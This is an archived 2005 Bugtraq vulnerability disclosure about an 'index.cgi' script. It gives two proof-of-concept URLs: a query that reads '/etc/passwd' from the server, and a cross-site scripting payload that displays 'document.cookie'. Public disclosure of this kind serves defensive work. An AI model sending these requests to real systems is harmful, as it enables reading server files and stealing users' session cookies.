Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: index.cgi script XSS + file show

index.cgi script XSS + file show

From: fireboy fireboy <fireboynet_at_webmails.com>
Date: 24 Apr 2005 21:08:19 -0000
('binary' encoding is not supported, stored as-is) Tunis 24/04/2005
BUG found by fireboy
fireboy_at_webmails.com

THERE ARE SOME BUGS IN index.cgi SCRIPT THAT CAN SHOW SENSILBLES FILES IN A SYSTEM

IT IS ONLY FOR SECURITY AND EDUCATIONAL PURPOSE

1)file showing
http://www.target.com/index.cgi?/etc/passwd

2)CSS
http://www.target.com/index.cgi?&lt;script&gt;alert(document.cookie)&lt;/script&gt;

greetz to all magattack members www.magattack.tk
Received on Apr 25 2005

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]